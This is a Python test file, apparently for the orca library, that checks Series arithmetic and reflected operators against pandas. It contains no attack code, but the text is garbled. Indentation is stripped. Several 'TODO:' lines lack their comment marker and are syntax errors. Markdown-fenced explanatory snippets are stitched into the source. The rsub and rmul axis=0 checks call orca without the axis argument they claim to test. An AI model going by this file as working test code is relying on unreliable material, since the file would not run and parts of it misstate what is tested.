# TODO: default axis=0: orca.Series.add(1)
# c1 = ps.add(1)
# c2 = os.add(1).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_add_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps + [1, 2, 12, 10]
c2 = (os + [1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2)
c1 = ps.add([1, 2, 12, 10])
# TODO: orca.Series.add([1, 2, 12, 10])
# c2 = os.add([1, 2, 12, 10]).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_add_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
c1 = ps + psb
c2 = (os + osb).to_pandas()
assert_series_equal(c1, c2)
# series with series expression
c1 = ps + (1 / psb)
c2 = (os + (1 / osb)).to_pandas()
assert_series_equal(c1, c2)
# series expression with series expression
c1 = (ps * [1, 3, 5, 4]) + (1 / psb)
c2 = ((os * [1, 3, 5, 4]) + (1 / osb)).to_pandas()
assert_series_equal(c1, c2)
c1 = pdf["float"] + pdf["int"]
c2 = (odf["float"] + odf["int"]).to_pandas()
assert_series_equal(c1, c2)
# series with series
# default axis=0
c1 = ps.add(psb)
c2 = os.add(osb).to_pandas()
assert_series_equal(c1, c2)
# specify axis=0
c1 = ps.add(psb, axis=0)
c2 = os.add(osb, axis=0).to_pandas()
assert_series_equal(c1, c2)
# specify axis=1, ValueError expected
# TODO: ValueError expected: orca.Series.add(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.add(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.add(osb, axis=1)
def test_series_binary_operator_function_sub_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps - 1
c2 = (os - 1).to_pandas()
assert_series_equal(c1, c2)
# TODO: orca.Series.sub(1)
# c1 = ps.sub(1)
# c2 = os.sub(1).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_sub_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps - [1, 2, 12, 10]
c2 = (os - [1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2)
c1 = ps.sub([1, 2, 12, 10])
# TODO: orca.Series.sub([1, 2, 12, 10])
# c2 = os.sub([1, 2, 12, 10]).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_sub_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
c1 = ps - psb
c2 = (os - osb).to_pandas()
assert_series_equal(c1, c2)
# series with series expression
c1 = ps - (1 / psb)
c2 = (os - (1 / osb)).to_pandas()
assert_series_equal(c1, c2)
# series expression with series expression
c1 = (ps * [1, 3, 5, 4]) - (1 / psb)
c2 = ((os * [1, 3, 5, 4]) - (1 / osb)).to_pandas()
assert_series_equal(c1, c2)
# TODO: odf["float"] - odf["int"]
# c1 = pdf["float"] - pdf["int"]
# c2 = (odf["float"] - odf["int"]).to_pandas()
# assert_series_equal(c1, c2)
# series with series
# default axis=0
# TODO: orca.Series.sub(orca.Series())
# c1 = ps.sub(psb)
# c2 = os.sub(osb).to_pandas()
# assert_series_equal(c1, c2)
# specify axis=0
c1 = ps.sub(psb, axis=0)
c2 = os.sub(osb, axis=0).to_pandas()
assert_series_equal(c1, c2)
# specify axis=1, ValueError expected
# TODO: orca.Series.sub(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.sub(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.sub(osb, axis=1)
def test_series_binary_operator_function_mul_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps * 1
c2 = (os * 1).to_pandas()
assert_series_equal(c1, c2)
# TODO: orca.Series.mul(1)
# c1 = ps.mul(1)
# c2 = os.mul(1).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_mul_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps * [1, 2, 12, 10]
c2 = (os * [1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2)
# TODO: orca.Series.mul([1, 2, 12, 10])
# c1 = ps.mul([1, 2, 12, 10])
# c2 = os.mul([1, 2, 12, 10]).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_mul_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
c1 = ps * psb
c2 = (os * osb).to_pandas()
assert_series_equal(c1, c2)
# series with series expression
c1 = ps * (1 / psb)
c2 = (os * (1 / osb)).to_pandas()
assert_series_equal(c1, c2)
# series expression with series expression
c1 = (ps * [1, 3, 5, 4]) * (1 / psb)
c2 = ((os * [1, 3, 5, 4]) * (1 / osb)).to_pandas()
assert_series_equal(c1, c2)
# TODO: odf["float"] * odf["int"]
# c1 = pdf["float"] * pdf["int"]
# c2 = (odf["float"] * odf["int"]).to_pandas()
# assert_series_equal(c1, c2)
# series with series
# default axis=0
# TODO: orca.Series.mul(orca.Series())
# c1 = ps.mul(psb)
# c2 = os.mul(osb).to_pandas()
# assert_series_equal(c1, c2)
# specify axis=0
c1 = ps.mul(psb, axis=0)
c2 = os.mul(osb, axis=0).to_pandas()
assert_series_equal(c1, c2)
# specify axis=1, ValueError expected
# TODO: orca.Series.mul(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.mul(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.mul(osb, axis=1)
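# The fixtures above pair a uniquely-indexed series (ps) against one with a
# duplicate 'a' label (psb); pandas aligns operands on index labels and expands
# the duplicate in the result. A minimal standalone sketch of that alignment
# behavior (plain pandas, independent of orca):

```python
import pandas as pd

s1 = pd.Series([10, 1], index=['a', 'b'])
s2 = pd.Series([1, 2, 3], index=['a', 'a', 'b'])
out = s1 * s2
# the single 'a' row of s1 is matched against both 'a' rows of s2
assert list(out.index) == ['a', 'a', 'b']
assert list(out) == [10, 20, 3]
```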
def test_series_binary_operator_function_div_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps / 1
c2 = (os / 1).to_pandas()
assert_series_equal(c1, c2)
# TODO: orca.Series.div(1)
# c1 = ps.div(1)
# c2 = os.div(1).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_div_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps / [1, 2, 12, 10]
c2 = (os / [1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2)
# TODO: orca.Series.div([1, 2, 12, 10])
# c1 = ps.div([1, 2, 12, 10])
# c2 = os.div([1, 2, 12, 10]).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_div_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
c1 = ps / psb
c2 = (os / osb).to_pandas()
assert_series_equal(c1, c2)
# series with series expression
c1 = ps / (1 + psb)
c2 = (os / (1 + osb)).to_pandas()
assert_series_equal(c1, c2)
# series expression with series expression
c1 = (ps - [1, 3, 5, 4]) / (1 + psb)
c2 = ((os - [1, 3, 5, 4]) / (1 + osb)).to_pandas()
assert_series_equal(c1, c2)
TODO: odf["float"] / odf["int"]
# c1 = pdf["float"] / pdf["int"]
# c2 = (odf["float"] / odf["int"]).to_pandas()
# assert_series_equal(c1, c2)
# default axis=0
# TODO: orca.Series.div(orca.Series())
# c1 = ps.div(psb)
# c2 = os.div(osb).to_pandas()
# assert_series_equal(c1, c2)
# specify axis=0
c1 = ps.div(psb, axis=0)
c2 = os.div(osb, axis=0).to_pandas()
assert_series_equal(c1, c2)
# specify axis=1, ValueError expected
# TODO: orca.Series.div(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.div(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.div(osb, axis=1)
def test_series_binary_operator_function_truediv_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
# TODO: orca.Series.truediv(1)
# c1 = ps.truediv(1)
# c2 = os.truediv(1).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_truediv_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
# TODO: orca.Series.truediv([1, 2, 12, 10])
# c1 = ps.truediv([1, 2, 12, 10])
# c2 = os.truediv([1, 2, 12, 10]).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_truediv_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
# default axis=0
# TODO: orca.Series.truediv(orca.Series())
# c1 = ps.truediv(psb)
# c2 = os.truediv(osb).to_pandas()
# assert_series_equal(c1, c2)
# specify axis=0
c1 = ps.truediv(psb, axis=0)
c2 = os.truediv(osb, axis=0).to_pandas()
assert_series_equal(c1, c2)
# specify axis=1, ValueError expected
# TODO: orca.Series.truediv(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.truediv(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.truediv(osb, axis=1)
def test_series_binary_operator_function_floordiv_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps // 1
c2 = (os // 1).to_pandas()
assert_series_equal(c1, c2)
# TODO: orca.Series.floordiv(1)
# c1 = ps.floordiv(1)
# c2 = os.floordiv(1).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_floordiv_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps // [1, 2, 12, 10]
c2 = (os // [1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2)
# TODO: orca.Series.floordiv([1, 2, 12, 10])
# c1 = ps.floordiv([1, 2, 12, 10])
# c2 = os.floordiv([1, 2, 12, 10]).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_floordiv_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
c1 = ps // psb
c2 = (os // osb).to_pandas()
assert_series_equal(c1, c2)
# series with series expression
c1 = ps // (1 + psb)
c2 = (os // (1 + osb)).to_pandas()
assert_series_equal(c1, c2)
# series expression with series expression
c1 = (ps - [1, 3, 5, 4]) // (1 + psb)
c2 = ((os - [1, 3, 5, 4]) // (1 + osb)).to_pandas()
assert_series_equal(c1, c2)
TODO: odf["float"] // odf["int"]
# c1 = pdf["float"] // pdf["int"]
# c2 = (odf["float"] // odf["int"]).to_pandas()
# assert_series_equal(c1, c2)
# series with series
# default axis=0
# TODO: orca.Series.floordiv(orca.Series())
# c1 = ps.floordiv(psb)
# c2 = os.floordiv(osb).to_pandas()
# assert_series_equal(c1, c2)
# specify axis=0
c1 = ps.floordiv(psb, axis=0)
c2 = os.floordiv(osb, axis=0).to_pandas()
assert_series_equal(c1, c2)
# specify axis=1, ValueError expected
# TODO: orca.Series.floordiv(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.floordiv(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.floordiv(osb, axis=1)
def test_series_binary_operator_function_mod_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps % 1
c2 = (os % 1).to_pandas()
assert_series_equal(c1, c2)
# TODO: orca.Series.mod(1)
# c1 = ps.mod(1)
# c2 = os.mod(1).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_mod_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps % [1, 2, 12, 10]
c2 = (os % [1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2)
# TODO: orca.Series.mod([1, 2, 12, 10])
# c1 = ps.mod([1, 2, 12, 10])
# c2 = os.mod([1, 2, 12, 10]).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_mod_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
c1 = ps % psb
c2 = (os % osb).to_pandas()
assert_series_equal(c1, c2)
# series with series expression
c1 = ps % (1 + psb)
c2 = (os % (1 + osb)).to_pandas()
assert_series_equal(c1, c2)
# series expression with series expression
c1 = (ps - [1, 3, 5, 4]) % (1 + psb)
c2 = ((os - [1, 3, 5, 4]) % (1 + osb)).to_pandas()
assert_series_equal(c1, c2)
TODO: odf["float"] % odf["int"]
# c1 = pdf["float"] % pdf["int"]
# c2 = (odf["float"] % odf["int"]).to_pandas()
# assert_series_equal(c1, c2)
# series with series
# default axis=0
# TODO: orca.Series.mod(orca.Series())
# c1 = ps.mod(psb)
# c2 = os.mod(osb).to_pandas()
# assert_series_equal(c1, c2)
# specify axis=0
c1 = ps.mod(psb, axis=0)
c2 = os.mod(osb, axis=0).to_pandas()
assert_series_equal(c1, c2)
# specify axis=1, ValueError expected
# TODO: orca.Series.mod(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.mod(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.mod(osb, axis=1)
def test_series_binary_operator_function_pow_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps ** 1
c2 = (os ** 1).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# TODO: orca.Series.pow(1)
# c1 = ps.pow(1)
# c2 = os.pow(1).to_pandas()
# assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_pow_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps ** [1, 2, 12, 10]
c2 = (os ** [1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# TODO: orca.Series.pow([1, 2, 12, 10])
# c1 = ps.pow([1, 2, 12, 10])
# c2 = os.pow([1, 2, 12, 10]).to_pandas()
# assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_pow_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
c1 = ps ** psb
c2 = (os ** osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# series with series expression
c1 = ps ** (1 + psb)
c2 = (os ** (1 + osb)).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# series expression with series expression
c1 = (ps - [1, 3, 5, 4]) ** (1 + psb)
c2 = ((os - [1, 3, 5, 4]) ** (1 + osb)).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
TODO: odf["float"] ** odf["int"]
# c1 = pdf["float"] ** pdf["int"]
# c2 = (odf["float"] ** odf["int"]).to_pandas()
# assert_series_equal(c1, c2, check_dtype=False)
# series with series
# default axis=0
# TODO: orca.Series.pow(orca.Series())
# c1 = ps.pow(psb)
# c2 = os.pow(osb).to_pandas()
# assert_series_equal(c1, c2, check_dtype=False)
# specify axis=0
c1 = ps.pow(psb, axis=0)
c2 = os.pow(osb, axis=0).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=1, ValueError expected
# TODO: orca.Series.pow(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.pow(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.pow(osb, axis=1)
def test_series_binary_operator_function_radd_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.radd(1)
c2 = os.radd(1).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_radd_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.radd([1, 2, 12, 10])
c2 = os.radd([1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
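# The reflected (r-prefixed) methods tested here swap operand order:
# s.radd(x) computes x + s. For addition the result is the same either way;
# for a non-commutative operator the swap matters. A standalone pandas check:

```python
import pandas as pd

s = pd.Series([10, 1, 19, -5])
# radd is reflected addition: s.radd(1) is 1 + s
assert s.radd(1).equals(1 + s)
# rsub is reflected subtraction: s.rsub(1) is 1 - s, not s - 1
assert s.rsub(1).equals(1 - s)
```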
def test_series_binary_operator_function_radd_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
# default axis=0
c1 = ps.radd(psb)
c2 = os.radd(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=0
# TODO: raise error: orca.Series.radd(orca.Series(), axis=0)
# c1 = ps.radd(psb, axis=0)
# c2 = os.radd(osb, axis=0).to_pandas()
# assert_series_equal(c1, c2, check_dtype=False)
# specify axis=1, ValueError expected
# TODO: ValueError expected orca.Series.radd(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.radd(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.radd(osb, axis=1)
def test_series_binary_operator_function_rsub_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.rsub(1)
c2 = os.rsub(1).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rsub_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.rsub([1, 2, 12, 10])
c2 = os.rsub([1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rsub_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
# default axis=0
c1 = ps.rsub(psb)
c2 = os.rsub(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=0
c1 = ps.rsub(psb, axis=0)
c2 = os.rsub(osb).to_pandas()  # axis omitted for orca (see radd axis=0 TODO above)
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=1, ValueError expected
# TODO: orca.Series.rsub(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.rsub(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.rsub(osb, axis=1)
def test_series_binary_operator_function_rmul_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.rmul(1)
c2 = os.rmul(1).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rmul_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.rmul([1, 2, 12, 10])
c2 = os.rmul([1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rmul_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
# default axis=0
c1 = ps.rmul(psb)
c2 = os.rmul(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=0
c1 = ps.rmul(psb, axis=0)
c2 = os.rmul(osb).to_pandas()  # axis omitted for orca (see radd axis=0 TODO above)
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=1, ValueError expected
# TODO: orca.Series.rmul(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.rmul(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.rmul(osb, axis=1)
def test_series_binary_operator_function_rdiv_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.rdiv(1)
